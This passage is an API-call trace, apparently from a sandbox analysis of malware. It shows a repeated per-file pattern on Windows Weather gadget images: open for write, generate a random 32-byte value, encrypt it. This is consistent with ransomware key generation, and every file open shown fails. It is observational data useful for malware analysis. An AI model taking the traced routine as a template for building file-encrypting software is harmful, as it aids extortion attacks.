(lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_few-showers.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_few-showers.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.607] GetProcessHeap () returned 0x2c0000 [0160.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.607] GetProcessHeap () returned 0x2c0000 [0160.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3fe60 | out: hHeap=0x2c0000) returned 1 [0160.607] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9e0 | out: pbBuffer=0x25ce9e0) returned 1 [0160.608] GetProcessHeap () returned 0x2c0000 [0160.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.608] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9d8*=0x30) returned 1 [0160.608] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.608] GetProcessHeap () returned 0x2c0000 [0160.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.608] GetProcessHeap () returned 0x2c0000 [0160.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3fd48 | out: hHeap=0x2c0000) returned 1 [0160.608] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9e0 | out: pbBuffer=0x25ce9e0) returned 1 [0160.608] GetProcessHeap () returned 0x2c0000 [0160.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.608] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9d8*=0x30) returned 1 [0160.608] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_windy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_windy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.608] GetProcessHeap () returned 0x2c0000 [0160.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.608] GetProcessHeap () returned 0x2c0000 [0160.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3fc30 | out: hHeap=0x2c0000) returned 1 [0160.608] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9d8 | out: pbBuffer=0x25ce9d8) returned 1 [0160.608] GetProcessHeap () returned 0x2c0000 [0160.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.609] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9d0*=0x30) returned 1 [0160.609] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_sun.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_sun.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.609] GetProcessHeap () returned 0x2c0000 [0160.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.609] GetProcessHeap () returned 0x2c0000 [0160.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f42900 | out: hHeap=0x2c0000) returned 1 [0160.609] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9d8 | out: pbBuffer=0x25ce9d8) returned 1 [0160.609] GetProcessHeap () returned 0x2c0000 [0160.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.609] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9d0*=0x30) returned 1 [0160.609] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_snow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_snow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.631] GetProcessHeap () returned 0x2c0000 [0160.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.631] GetProcessHeap () returned 0x2c0000 [0160.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f427f8 | out: hHeap=0x2c0000) returned 1 [0160.631] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9d0 | out: pbBuffer=0x25ce9d0) returned 1 [0160.631] GetProcessHeap () returned 0x2c0000 [0160.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.631] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9c8*=0x30) returned 1 [0160.631] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_thunderstorm.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_thunderstorm.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.633] GetProcessHeap () returned 0x2c0000 [0160.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.633] GetProcessHeap () returned 0x2c0000 [0160.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f49668 | out: hHeap=0x2c0000) returned 1 [0160.633] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9d0 | out: pbBuffer=0x25ce9d0) returned 1 [0160.633] GetProcessHeap () returned 0x2c0000 [0160.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.633] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9c8*=0x30) returned 1 [0160.633] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_rainy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_rainy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.634] GetProcessHeap () returned 0x2c0000 [0160.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.635] GetProcessHeap () returned 0x2c0000 [0160.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3f8e8 | out: hHeap=0x2c0000) returned 1 [0160.635] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9c8 | out: pbBuffer=0x25ce9c8) returned 1 [0160.635] GetProcessHeap () returned 0x2c0000 [0160.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.635] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9c0*=0x30) returned 1 [0160.635] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-gibbous.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-gibbous.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.636] GetProcessHeap () returned 0x2c0000 [0160.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.636] GetProcessHeap () returned 0x2c0000 [0160.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f49540 | out: hHeap=0x2c0000) returned 1 [0160.637] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9c8 | out: pbBuffer=0x25ce9c8) returned 1 [0160.637] GetProcessHeap () returned 0x2c0000 [0160.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.637] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9c0*=0x30) returned 1 [0160.637] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-crescent.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-crescent.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.638] GetProcessHeap () returned 0x2c0000 [0160.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.638] GetProcessHeap () returned 0x2c0000 [0160.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47340 | out: hHeap=0x2c0000) returned 1 [0160.638] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9c0 | out: pbBuffer=0x25ce9c0) returned 1 [0160.638] GetProcessHeap () returned 0x2c0000 [0160.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.639] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9b8*=0x30) returned 1 [0160.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-gibbous.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-gibbous.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.640] GetProcessHeap () returned 0x2c0000 [0160.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.640] GetProcessHeap () returned 0x2c0000 [0160.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f49418 | out: hHeap=0x2c0000) returned 1 [0160.640] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9c0 | out: pbBuffer=0x25ce9c0) returned 1 [0160.640] GetProcessHeap () returned 0x2c0000 [0160.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.640] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9b8*=0x30) returned 1 [0160.640] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-crescent.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.642] GetProcessHeap () returned 0x2c0000 [0160.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.642] GetProcessHeap () returned 0x2c0000 [0160.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47208 | out: hHeap=0x2c0000) returned 1 [0160.642] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9b8 | out: pbBuffer=0x25ce9b8) returned 1 [0160.642] GetProcessHeap () returned 0x2c0000 [0160.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.642] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9b0*=0x30) returned 1 [0160.642] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-new.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.644] GetProcessHeap () returned 0x2c0000 [0160.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.644] GetProcessHeap () returned 0x2c0000 [0160.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3f7d0 | out: hHeap=0x2c0000) returned 1 [0160.644] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9b8 | out: pbBuffer=0x25ce9b8) returned 1 [0160.644] GetProcessHeap () returned 0x2c0000 [0160.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.644] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9b0*=0x30) returned 1 [0160.644] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-last-quarter.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.645] GetProcessHeap () returned 0x2c0000 [0160.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.645] GetProcessHeap () returned 0x2c0000 [0160.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f492f0 | out: hHeap=0x2c0000) returned 1 [0160.645] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9b0 | out: pbBuffer=0x25ce9b0) returned 1 [0160.645] GetProcessHeap () returned 0x2c0000 [0160.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.646] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9a8*=0x30) returned 1 [0160.646] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-full.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.647] GetProcessHeap () returned 0x2c0000 [0160.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.647] GetProcessHeap () returned 0x2c0000 [0160.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3f6b8 | out: hHeap=0x2c0000) returned 1 [0160.647] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9b0 | out: pbBuffer=0x25ce9b0) returned 1 [0160.647] GetProcessHeap () returned 0x2c0000 [0160.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.647] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9a8*=0x30) returned 1 [0160.647] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-first-quarter.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.651] GetProcessHeap () returned 0x2c0000 [0160.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.652] GetProcessHeap () returned 0x2c0000 [0160.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f491c8 | out: hHeap=0x2c0000) returned 1 [0160.652] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9a8 | out: pbBuffer=0x25ce9a8) returned 1 [0160.652] GetProcessHeap () returned 0x2c0000 [0160.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.652] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9a0*=0x30) returned 1 [0160.652] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_foggy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_foggy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.657] GetProcessHeap () returned 0x2c0000 [0160.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.657] GetProcessHeap () returned 0x2c0000 [0160.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3f488 | out: hHeap=0x2c0000) returned 1 [0160.657] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9a8 | out: pbBuffer=0x25ce9a8) returned 1 [0160.657] GetProcessHeap () returned 0x2c0000 [0160.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.658] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce9a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce9a0*=0x30) returned 1 [0160.658] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\search_background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.658] GetProcessHeap () returned 0x2c0000 [0160.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.658] GetProcessHeap () returned 0x2c0000 [0160.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f425e8 | out: hHeap=0x2c0000) returned 1 [0160.658] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9a0 | out: pbBuffer=0x25ce9a0) returned 1 [0160.658] GetProcessHeap () returned 0x2c0000 [0160.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.658] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce998*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce998*=0x30) returned 1 [0160.659] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\redstateicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.660] GetProcessHeap () returned 0x2c0000 [0160.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.660] GetProcessHeap () returned 0x2c0000 [0160.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44428 | out: hHeap=0x2c0000) returned 1 [0160.660] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce9a0 | out: pbBuffer=0x25ce9a0) returned 1 [0160.660] GetProcessHeap () returned 0x2c0000 [0160.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.660] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce998*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce998*=0x30) returned 1 [0160.660] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\info.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.661] GetProcessHeap () returned 0x2c0000 [0160.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.662] GetProcessHeap () returned 0x2c0000 [0160.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8ad08 | out: hHeap=0x2c0000) returned 1 [0160.662] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce998 | out: pbBuffer=0x25ce998) returned 1 [0160.662] GetProcessHeap () returned 0x2c0000 [0160.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.662] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce990*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce990*=0x30) returned 1 [0160.662] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\graystateicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.663] GetProcessHeap () returned 0x2c0000 [0160.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.664] GetProcessHeap () returned 0x2c0000 [0160.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44228 | out: hHeap=0x2c0000) returned 1 [0160.664] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce998 | out: pbBuffer=0x25ce998) returned 1 [0160.664] GetProcessHeap () returned 0x2c0000 [0160.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.664] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce990*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce990*=0x30) returned 1 [0160.664] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_snow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.665] GetProcessHeap () returned 0x2c0000 [0160.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.665] GetProcessHeap () returned 0x2c0000 [0160.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f424e0 | out: hHeap=0x2c0000) returned 1 [0160.665] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce990 | out: pbBuffer=0x25ce990) returned 1 [0160.665] GetProcessHeap () returned 0x2c0000 [0160.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.666] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce988*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce988*=0x30) 